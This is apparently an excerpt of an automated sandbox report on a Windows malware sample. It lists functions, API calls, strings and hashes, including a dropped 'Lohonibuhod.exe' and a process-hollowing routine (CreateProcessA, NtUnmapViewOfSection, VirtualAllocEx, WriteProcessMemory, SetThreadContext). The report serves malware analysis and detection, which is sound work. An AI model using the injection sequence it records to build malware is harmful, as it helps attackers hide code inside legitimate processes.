GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32 ref: 00401D38
CreateFontIndirectA.GDI32(0040AF84), ref: 00401D8A

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction ID: 580b179190550232f88f4ba5e52f5296c98f8c4b0afe68c870f47754878f2485
Opcode Fuzzy Hash: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction Fuzzy Hash: 68F044F1A45342AEE702A7B0AE4B7993B649725309F100436F545BA1E2C5BC00149B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00402BD1
GetTickCount.KERNEL32(00000000,00402D9E,00000001), ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction ID: df45f881ccb5ca36463c1a09230da8cf23750fca8468dec1cd15007da7f5e5e8
Opcode Fuzzy Hash: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction Fuzzy Hash: 22F0F430A09120EBC6716F95FD4C99B7F64E704B157504437F001B55F5D67878829B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409378,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020AB

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-2935972921
Opcode ID: f64a4fc3f0a20e18ebbd393d0a0c832ccbaabc0cf5e8d3ee259825c4e2553bf8
Instruction ID: ee874f8c2dec57c4877f78095a0f9dac743c80c93ea62094aeb2a8065092a27c
Opcode Fuzzy Hash: f64a4fc3f0a20e18ebbd393d0a0c832ccbaabc0cf5e8d3ee259825c4e2553bf8
Instruction Fuzzy Hash: 07417D75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040381E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,0042E360), ref: 004038B6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040381F
1033, xrefs: 00403822, 0040382C, 0040389D

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-1176120985
Opcode ID: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction ID: f58d08b88b77c55e92e539ad5181c9965f6bbcffbd0d008a8b371c472e4a47a6
Opcode Fuzzy Hash: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction Fuzzy Hash: 9311D176B001009BC734EF56DC809737BADEB8471636881BFEC02A7390D639A8038A98

Uniqueness

Uniqueness Score: -1.00%

Function 00404CFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404D30
CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D9E

Part of subcall function 00403E0A: SendMessageA.USER32 ref: 00403E1C

Strings

, xrefs: 00404D08

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction ID: b16bf2df46199d4e0f4b20eb531931f7d117dfa55111be6f57691eac5a9fa7e0
Opcode Fuzzy Hash: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction Fuzzy Hash: 25114F71600218BBDB219F52DC41AAB3B69AF84365F00813FFA04B91E1C37D8D51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
WriteFile.KERNEL32(00000000,?,open Lohonibuhod.exe,00000000,?), ref: 004024FB

Strings

open Lohonibuhod.exe, xrefs: 004024CA, 004024EF

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: FileWritelstrlen
String ID: open Lohonibuhod.exe
API String ID: 427699356-432908772
Opcode ID: fafc01fa0b5d2362d242574a082482175bf6a202212f898f1eafb4efd6dd8d4c
Instruction ID: 266b505f4b4a70e0031bd9b61304a7f29979de1156be46298b6644775383f0d6
Opcode Fuzzy Hash: fafc01fa0b5d2362d242574a082482175bf6a202212f898f1eafb4efd6dd8d4c
Instruction Fuzzy Hash: 70F0B4B2B04201AFDB00EBA19E49AAF36589B40348F14443BB142F50C2D6BC4941AB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004034C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000,00403498,004032EB,00000000), ref: 004034DA
GlobalFree.KERNEL32(?), ref: 004034E1

Strings

"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 004034D2

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
API String ID: 1100898210-1098974352
Opcode ID: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction ID: a7ab284cabc648ba81e11ba063b903b3b671d5f7e61a69f5101281db245b6d62
Opcode Fuzzy Hash: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction Fuzzy Hash: E1E08C329110209BD6221F05AE0575A7B6D6B44B32F02802AE9407B2A087746C424BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00405546 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp\MSI,00402C8E,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 0040554C
CharPrevA.USER32(80000000,00000000), ref: 0040555A

Strings

C:\Users\user\AppData\Local\Temp\MSI, xrefs: 00405546

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Local\Temp\MSI
API String ID: 2709904686-654057852
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: fca702df0190f5d4796b13fce4c8f5ccfdab60c3fa8ed772e71c257c4247ae30
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 39D0A772508EB07EE70366149C00B9F7A88CF13340F094462E040A61D4C27C4D418FFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405658 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405678
CharNextA.USER32(00000000), ref: 00405686
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: fee4d645b7b415a6dc1afaac75e8b1817c7eae67fc86a6e8a33b60f3285d70db
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 05F0A736309D519AC2125B295C04A6F6A98EF91314B58097AF444F2140E33A9C119BBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Lohonibuhod.exePID: 1396, Parent PID: 1948COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	316
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001000 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 223
injectionprocesslibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?), ref: 10001046

Part of subcall function 10001301: GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,1000105A,00000000,100051F0), ref: 1000131C
Part of subcall function 10001301: GetProcAddress.KERNEL32(?,?), ref: 10001349
Part of subcall function 10001301: LoadLibraryA.KERNEL32(?,?), ref: 10001362

GetCommandLineA.KERNEL32(00000000,100051F0), ref: 1000105A
PathGetArgsA.SHLWAPI(00000000), ref: 10001061
RtlZeroMemory.NTDLL(10005210,00000044), ref: 100010A4
LoadLibraryA.KERNEL32(00302682), ref: 100010DB
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,10005210,10005534), ref: 10001125
NtUnmapViewOfSection.NTDLL(00000068,?), ref: 1000113B
VirtualAllocEx.KERNEL32(00000068,?,?,00003000,00000040), ref: 100011C9
WriteProcessMemory.KERNEL32(00000068,?,?,?,00000000), ref: 100011ED
SetThreadContext.KERNEL32(00000064,10005274), ref: 100012E0

Strings

F)0, xrefs: 10001080, 1000112B, 100011B6, 100011D9, 100011F3, 1000123D, 10001252, 100012BD
(, xrefs: 1000125B

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: AddressLibraryLoadMemoryProcProcess$AllocArgsCommandContextCreateHandleLineModulePathSectionThreadUnmapViewVirtualWriteZero
String ID: ($F)0
API String ID: 1080973309-239859076
Opcode ID: a38787383578460d9f80fd7ad5fe535ca0efe5eb2b17e4e9531d122c72930174
Instruction ID: 76c8b29cae2120b4dc249c8130facd7c94d54277ada5e0b6c53328871c768ed4
Opcode Fuzzy Hash: a38787383578460d9f80fd7ad5fe535ca0efe5eb2b17e4e9531d122c72930174
Instruction Fuzzy Hash: A0A1AF742052259FE704CF68CCD8E667BA9FF4E38A78541A8E5068B37AC732E811CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040168C Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 004016B9
__p__fmode.MSVCRT ref: 004016CE
__p__commode.MSVCRT ref: 004016DC
__setusermatherr.MSVCRT ref: 00401708
_initterm.MSVCRT ref: 0040171E
__getmainargs.MSVCRT ref: 00401741
_initterm.MSVCRT ref: 00401751
GetStartupInfoA.KERNEL32 ref: 00401790
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004017B4
exit.MSVCRT ref: 004017C4
_XcptFilter.MSVCRT ref: 004017D6

Memory Dump Source

Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 1aab29c4961d9801456f6f2daad18b18a4c27e3fb86cf4f94d382372d13c427c
Instruction ID: 52233c6cf25bfc6cc73b3f2363ea5102594a70d695ffa1cbd7b767b4891c9421
Opcode Fuzzy Hash: 1aab29c4961d9801456f6f2daad18b18a4c27e3fb86cf4f94d382372d13c427c
Instruction Fuzzy Hash: 92417F75800348AFDB209FA5DA49A6A7BBCEB09711F20413FF551B72E1D7784941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00221000 Relevance: 10.6, APIs: 7, Instructions: 53
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

div.MSVCRT ref: 0022100C
VirtualAlloc.KERNELBASE(00000000,000000E8,00001000,00000004), ref: 0022102D
CreateFileW.KERNELBASE(00223010,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0022104A
VirtualQuery.KERNEL32(00223048,?,0000001C), ref: 00221063
calloc.MSVCRT ref: 00221081
ReadFile.KERNELBASE(00000000,00000000,00006000,00223038,00000000), ref: 0022109D
CloseHandle.KERNELBASE(00000000), ref: 002210A4

Memory Dump Source

Source File: 00000006.00000002.364608956.0000000000221000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00220000, based on PE: true

Associated: 00000006.00000002.364606591.0000000000220000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.364611624.0000000000222000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.364614006.0000000000224000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_220000_Lohonibuhod.jbxd

Similarity

API ID: FileVirtual$AllocCloseCreateHandleQueryReadcalloc
String ID:
API String ID: 2764131044-0
Opcode ID: 7888f77b33028656a53fa628e7dfbca5873844f315b6fe46792913baa491c990
Instruction ID: 5a1c7f4c1f207d1fde1815481f4d799f92e140fe37dff6bf8a490bb5af814fc0
Opcode Fuzzy Hash: 7888f77b33028656a53fa628e7dfbca5873844f315b6fe46792913baa491c990
Instruction Fuzzy Hash: FA118070684310FBF234DB94BC4EF9A3AA0AB58B11F405110F749AA1E0D3B9575ACB79

Uniqueness

Uniqueness Score: -1.00%

Function 10001655 Relevance: 7.5, APIs: 5, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00290584,00100000,00004000,?,?,?,?,10001443,10001489,?,?,?), ref: 10001683
VirtualFree.KERNELBASE(00290584,00000000,00008000,?,?,10001443,10001489,?,?,?), ref: 1000168E
HeapFree.KERNEL32(00000000,?), ref: 1000169B
HeapFree.KERNEL32(00000000,?,?), ref: 100016B9
HeapDestroy.KERNELBASE(?,?,10001443,10001489,?,?,?), ref: 100016C1

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
Instruction ID: f094b2a649a24d5681c3d571a21ce20a7fdc0a31d332c37fd24c43dfc87827bc
Opcode Fuzzy Hash: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
Instruction Fuzzy Hash: 44F06D36240225EFFA229F51CDCAF46BB61EB457E2F264020F340260B8C6737820DB18

Uniqueness

Uniqueness Score: -1.00%

Function 100024F9 Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,100022C1,00000000,00000001,00000000), ref: 10002521
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,100022C1,00000000,00000001,00000000), ref: 10002555
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004), ref: 1000256F
HeapFree.KERNEL32(00000000,?), ref: 10002586

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
Instruction ID: 59a76fa856539d024bcd95d47298204902c07f09fe04d0fd7388b831c6c067a5
Opcode Fuzzy Hash: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
Instruction Fuzzy Hash: 4A115870200B62DFE721CF18CCC5A177BB1FB897E27214A19E262D61B8D7729955CF14

Uniqueness

Uniqueness Score: -1.00%

Function 10001301 Relevance: 4.6, APIs: 3, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,1000105A,00000000,100051F0), ref: 1000131C
GetProcAddress.KERNEL32(?,?), ref: 10001349
LoadLibraryA.KERNEL32(?,?), ref: 10001362

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
